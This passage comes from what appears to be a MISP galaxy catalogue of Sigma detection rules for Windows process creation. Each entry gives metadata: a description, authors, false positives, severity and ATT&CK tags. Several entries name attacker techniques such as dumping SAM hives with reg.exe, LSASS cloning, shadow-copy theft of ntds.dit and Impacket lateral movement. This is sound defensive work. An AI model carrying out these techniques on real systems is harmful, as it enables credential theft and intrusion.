creation_date 2022/02/28
falsepositive ['Software installers that pull packages from remote systems and execute them']
filename proc_creation_win_powershell_susp_download_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Use of Setres.exe

Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path

Internal MISP references

UUID 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7 which can be used as unique global reference for Use of Setres.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/12/11
falsepositive ['Legitimate usage of Setres']
filename proc_creation_win_lolbin_setres.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Permission Check Via Accesschk.EXE

Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges

Internal MISP references

UUID c625d754-6a3d-4f65-9c9a-536aea960d37 which can be used as unique global reference for Permission Check Via Accesschk.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/13
falsepositive ['System administrator Usage']
filename proc_creation_win_sysinternals_accesschk_check_permissions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

HackTool - SharpLDAPmonitor Execution

Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.

Internal MISP references

UUID 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541 which can be used as unique global reference for HackTool - SharpLDAPmonitor Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharp_ldap_monitor.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

DLL Sideloading by VMware Xfer Utility

Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL

Internal MISP references

UUID ebea773c-a8f1-42ad-a856-00cb221966e8 which can be used as unique global reference for DLL Sideloading by VMware Xfer Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename proc_creation_win_dll_sideload_vmware_xfer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

HackTool - Covenant PowerShell Launcher

Detects suspicious command lines used in Covenant luanchers

Internal MISP references

UUID c260b6db-48ba-4b4a-a76f-2f67644e99d2 which can be used as unique global reference for HackTool - Covenant PowerShell Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2020/06/04
falsepositive No established falsepositives
filename proc_creation_win_hktl_covenant.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.001', 'attack.t1564.003']
Related clusters

To see the related clusters, click here.

Sideloading Link.EXE

Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name

Internal MISP references

UUID 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6 which can be used as unique global reference for Sideloading Link.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sideload_link_binary.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Script Execution From Temp Folder

Detects a suspicious script executions from temporary folder

Internal MISP references

UUID a6a39bdb-935c-4f0a-ab77-35f4bbf44d33 which can be used as unique global reference for Suspicious Script Execution From Temp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
creation_date 2021/07/14
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_script_exec_from_temp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Base64 Encoded PowerShell Command Detected

Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string

Internal MISP references

UUID e32d4572-9826-4738-b651-95fa63747e8a which can be used as unique global reference for Base64 Encoded PowerShell Command Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/29
falsepositive ['Administrative script libraries']
filename proc_creation_win_powershell_frombase64string.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1027', 'attack.defense_evasion', 'attack.t1140', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New Root Certificate Installed Via CertMgr.EXE

Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID ff992eac-6449-4c60-8c1d-91c9722a1d48 which can be used as unique global reference for New Root Certificate Installed Via CertMgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2023/03/05
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename proc_creation_win_certmgr_certificate_installation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Sysinternals PsService Execution

Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering

Internal MISP references

UUID 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f which can be used as unique global reference for Sysinternals PsService Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/16
falsepositive ['Legitimate use of PsService by an administrator']
filename proc_creation_win_sysinternals_psservice.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

New Firewall Rule Added Via Netsh.EXE

Detects the addition of a new rule to the Windows firewall via netsh

Internal MISP references

UUID cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c which can be used as unique global reference for New Firewall Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Sander Wiebing
creation_date 2019/01/29
falsepositive ['Legitimate administration activity', 'Software installations']
filename proc_creation_win_netsh_fw_add_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004', 'attack.s0246']
Related clusters

To see the related clusters, click here.

Suspicious Download from Office Domain

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

Internal MISP references

UUID 00d49ed5-4491-4271-a8db-650a4ef6f8c1 which can be used as unique global reference for Suspicious Download from Office Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/27
falsepositive ['Scripts or tools that download attachments from these domains (OneNote, Outlook 365)']
filename proc_creation_win_susp_download_office_domain.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105', 'attack.t1608']
Related clusters

To see the related clusters, click here.

PsExec/PAExec Escalation to LOCAL SYSTEM

Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights

Internal MISP references

UUID 8834e2f7-6b4b-4f09-8906-d2276470ee23 which can be used as unique global reference for PsExec/PAExec Escalation to LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/11/23
falsepositive ['Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)', 'Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension']
filename proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

Run PowerShell Script from Redirected Input Stream

Detects PowerShell script execution via input stream redirect

Internal MISP references

UUID c83bf4b5-cdf0-437c-90fa-43d734f7c476 which can be used as unique global reference for Run PowerShell Script from Redirected Input Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
creation_date 2020/10/17
falsepositive ['Unknown']
filename proc_creation_win_powershell_run_script_from_input_stream.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Lolbin Defaultpack.exe Use As Proxy

Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs

Internal MISP references

UUID b2309017-4235-44fe-b5af-b15363011957 which can be used as unique global reference for Lolbin Defaultpack.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/31
falsepositive ['Unknown']
filename proc_creation_win_lolbin_defaultpack.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion', 'attack.execution']
Related clusters

To see the related clusters, click here.

Suspicious UltraVNC Execution

Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)

Internal MISP references

UUID 871b9555-69ca-4993-99d3-35a59f9f3599 which can be used as unique global reference for Suspicious UltraVNC Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/03/04
falsepositive ['Unknown']
filename proc_creation_win_ultravnc_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.g0047', 'attack.t1021.005']
Related clusters

To see the related clusters, click here.

PowerShell Script Run in AppData

Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder

Internal MISP references

UUID ac175779-025a-4f12-98b0-acdaeb77ea85 which can be used as unique global reference for PowerShell Script Run in AppData in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/09
falsepositive ['Administrative scripts']
filename proc_creation_win_powershell_susp_ps_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Internet Hosted WebDav Share Mount Via Net.EXE

Detects when an internet hosted webdav share is mounted using the "net.exe" utility

Internal MISP references

UUID 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 which can be used as unique global reference for Windows Internet Hosted WebDav Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/21
falsepositive ['Unknown']
filename proc_creation_win_net_use_mount_internet_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Suspicious High IntegrityLevel Conhost Legacy Option

ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.

Internal MISP references

UUID 3037d961-21e9-4732-b27a-637bcc7bf539 which can be used as unique global reference for Suspicious High IntegrityLevel Conhost Legacy Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/09
falsepositive ['Very Likely, including launching cmd.exe via Run As Administrator']
filename proc_creation_win_conhost_legacy_option.yml
level informational
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspect Svchost Activity

It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.

Internal MISP references

UUID 16c37b52-b141-42a5-a3ea-bbe098444397 which can be used as unique global reference for Suspect Svchost Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett, @signalblur
creation_date 2019/12/28
falsepositive ['Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf']
filename proc_creation_win_svchost_execution_with_no_cli_flags.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - Jlaive In-Memory Assembly Execution

Detects the use of Jlaive to execute assemblies in a copied PowerShell

Internal MISP references

UUID 0a99eb3e-1617-41bd-b095-13dc767f3def which can be used as unique global reference for HackTool - Jlaive In-Memory Assembly Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
creation_date 2022/05/24
falsepositive ['Unknown']
filename proc_creation_win_hktl_jlaive_batch_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Suspicious WmiPrvSE Child Process

Detects suspicious and uncommon child processes of WmiPrvSE

Internal MISP references

UUID 8a582fe2-0882-4b89-a82a-da6b2dc32937 which can be used as unique global reference for Suspicious WmiPrvSE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_wmiprvse_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Enumeration for 3rd Party Creds From CLI

Detects processes that query known 3rd party registry keys that holds credentials via commandline

Internal MISP references

UUID 87a476dc-0079-4583-a985-dee7a20a03de which can be used as unique global reference for Enumeration for 3rd Party Creds From CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_registry_enumeration_for_credentials_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.002']
Related clusters

To see the related clusters, click here.

Application Terminated Via Wmic.EXE

Detects calls to the "terminate" function via wmic in order to kill an application

Internal MISP references

UUID 49d9671b-0a0a-4c09-8280-d215bfd30662 which can be used as unique global reference for Application Terminated Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_wmic_terminate_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Diantz Alternate Data Stream Execution

Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

Internal MISP references

UUID 6b369ced-4b1d-48f1-b427-fdc0de0790bd which can be used as unique global reference for Suspicious Diantz Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Very Possible']
filename proc_creation_win_lolbin_diantz_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Use NTFS Short Name in Image

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection

Internal MISP references

UUID 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b which can be used as unique global reference for Use NTFS Short Name in Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/06
falsepositive ['Software Installers']
filename proc_creation_win_susp_ntfs_short_name_use_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

HackTool - GMER Rootkit Detector and Remover Execution

Detects the execution GMER tool based on image and hash fields.

Internal MISP references

UUID 9082ff1f-88ab-4678-a3cc-5bcff99fc74d which can be used as unique global reference for HackTool - GMER Rootkit Detector and Remover Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_gmer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Terminal Service Process Spawn

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

Internal MISP references

UUID 1012f107-b8f1-4271-af30-5aed2de89b39 which can be used as unique global reference for Terminal Service Process Spawn in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/05/22
falsepositive ['Unknown']
filename proc_creation_win_svchost_termserv_proc_spawn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1190', 'attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Abused Debug Privilege by Arbitrary Parent Processes

Detection of unusual child processes by different system processes

Internal MISP references

UUID d522eca2-2973-4391-a3e0-ef0374321dae which can be used as unique global reference for Abused Debug Privilege by Arbitrary Parent Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Semanur Guneysu @semanurtg, oscd.community
creation_date 2020/10/28
falsepositive ['Unknown']
filename proc_creation_win_susp_abusing_debug_privilege.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Direct Autorun Keys Modification

Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.

Internal MISP references

UUID 24357373-078f-44ed-9ac4-6d334a668a11 which can be used as unique global reference for Direct Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.', 'Legitimate administrator sets up autorun keys for legitimate reasons.', 'Discord']
filename proc_creation_win_reg_direct_asep_registry_keys_modification.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Raccine Uninstall

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

Internal MISP references

UUID a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc which can be used as unique global reference for Raccine Uninstall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/21
falsepositive ['Legitimate deinstallation by administrative staff']
filename proc_creation_win_susp_disable_raccine.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

SQLite Firefox Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.

Internal MISP references

UUID 4833155a-4053-4c9c-a997-777fcea0baa7 which can be used as unique global reference for SQLite Firefox Profile Data DB Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_sqlite_firefox_gecko_profile_data.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1539', 'attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

Rundll32 Execution With Uncommon DLL Extension

Detects the execution of rundll32 with a command line that doesn't contain a common extension

Internal MISP references

UUID c3a99af4-35a9-4668-879e-c09aeb4f2bdf which can be used as unique global reference for Rundll32 Execution With Uncommon DLL Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
creation_date 2022/01/13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_uncommon_dll_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Dumping of Sensitive Hives Via Reg.EXE

Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

Internal MISP references

UUID fd877b94-9bb5-4191-bb25-d79cbd93c167 which can be used as unique global reference for Dumping of Sensitive Hives Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
creation_date 2019/10/22
falsepositive ['Dumping hives for legitimate purpouse i.e. backup or forensic investigation']
filename proc_creation_win_reg_dumping_sensitive_hives.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'car.2013-07-001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - AnyDesk Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b52e84a3-029e-4529-b09b-71d19dd27e94 which can be used as unique global reference for Remote Access Tool - AnyDesk Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_anydesk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious SYSTEM User Process Creation

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

Internal MISP references

UUID 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 which can be used as unique global reference for Suspicious SYSTEM User Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE (additional keywords)
creation_date 2021/12/20
falsepositive ['Administrative activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_susp_system_user_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134', 'attack.t1003', 'attack.t1027']
Related clusters

To see the related clusters, click here.

File Encryption/Decryption Via Gpg4win From Suspicious Locations

Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.

Internal MISP references

UUID e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d which can be used as unique global reference for File Encryption/Decryption Via Gpg4win From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/11/30
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.

Internal MISP references

UUID 41f407b5-3096-44ea-a74f-96d04fbc41be which can be used as unique global reference for Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/08
falsepositive ['Unlikely']
filename proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.initial_access']

Execute From Alternate Data Streams

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

Internal MISP references

UUID 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c which can be used as unique global reference for Execute From Alternate Data Streams in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/09/01
falsepositive ['Unknown']
filename proc_creation_win_susp_alternate_data_streams.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Format.com FileSystem LOLBIN

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

Internal MISP references

UUID 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60 which can be used as unique global reference for Format.com FileSystem LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Unknown']
filename proc_creation_win_lolbin_format.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Recon Command Output Piped To Findstr.EXE

Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.

Internal MISP references

UUID ccb5742c-c248-4982-8c5c-5571b9275ad3 which can be used as unique global reference for Recon Command Output Piped To Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/07/06
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_pipe_output.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1057']
Related clusters

To see the related clusters, click here.

Sensitive File Access Via Volume Shadow Copy Backup

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

Internal MISP references

UUID f57f8d16-1f39-4dcb-a604-6c73d9b54b3d which can be used as unique global reference for Sensitive File Access Via Volume Shadow Copy Backup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename proc_creation_win_susp_sensitive_file_access_shadowcopy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via LSASS Process Clone

Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity

Internal MISP references

UUID c8da0dfd-4ed0-4b68-962d-13c9c884384e which can be used as unique global reference for Potential Credential Dumping Via LSASS Process Clone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Samir Bousseaden
creation_date 2021/11/27
falsepositive ['Unknown']
filename proc_creation_win_lsass_process_clone.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Provlaunch.EXE Child Process

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID f9999590-1f94-4a34-a91e-951e47bedefd which can be used as unique global reference for Suspicious Provlaunch.EXE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

HackTool - Potential Impacket Lateral Movement Activity

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

Internal MISP references

UUID 10c14723-61c7-4c75-92ca-9af245723ad2 which can be used as unique global reference for HackTool - Potential Impacket Lateral Movement Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
creation_date 2019/09/03
falsepositive ['Unknown']
filename proc_creation_win_hktl_impacket_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Winrar Compressing Dump Files

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Internal MISP references

UUID 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc which can be used as unique global reference for Winrar Compressing Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting']
filename proc_creation_win_winrar_exfil_dmp_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

